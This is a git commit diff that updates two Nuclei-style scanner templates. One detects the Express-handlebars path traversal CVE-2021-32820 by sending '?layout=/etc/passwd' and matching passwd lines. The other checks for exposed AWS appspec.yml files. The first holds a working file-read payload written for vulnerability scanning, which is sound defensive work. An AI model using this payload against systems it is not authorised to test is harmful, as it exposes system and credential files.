WIP improvements
parent
ff374372e0
commit
7d72783090
|
@ -4,21 +4,26 @@ info:
|
|||
name: Express-handlebars Path Traversal
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
|
||||
tags: cve,cve2021,express,lfi
|
||||
reference: |
|
||||
- https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
|
||||
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
|
||||
tags: cve,cve2021,expressjs,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?layout=/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "\\s*root:[x*]"
|
||||
- "\\s*daemon:[x*]"
|
||||
- "\\s*operator:[x*]:"
|
||||
- "root:[x*]:0:0:"
|
||||
- "daemon:[x*]:0:0:"
|
||||
- "operator:[x*]:0:0:"
|
||||
part: body
|
||||
condition: or
|
||||
|
|
|
@ -12,22 +12,18 @@ requests:
|
|||
path:
|
||||
- "{{BaseURL}}/appspec.yml"
|
||||
- "{{BaseURL}}/appspec.yaml"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "\"version\""
|
||||
- "\"os\""
|
||||
- "\"files\""
|
||||
- "\"permissions\""
|
||||
- "\"hooks\""
|
||||
- "\"BeforeInstall\""
|
||||
- "\"ApplicationStart\""
|
||||
- "version:"
|
||||
- "os:"
|
||||
- "files:"
|
||||
- "source:"
|
||||
part: body
|
||||
- type: word
|
||||
words:
|
||||
- "application/yaml"
|
||||
part: header
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
Loading…
Reference in New Issue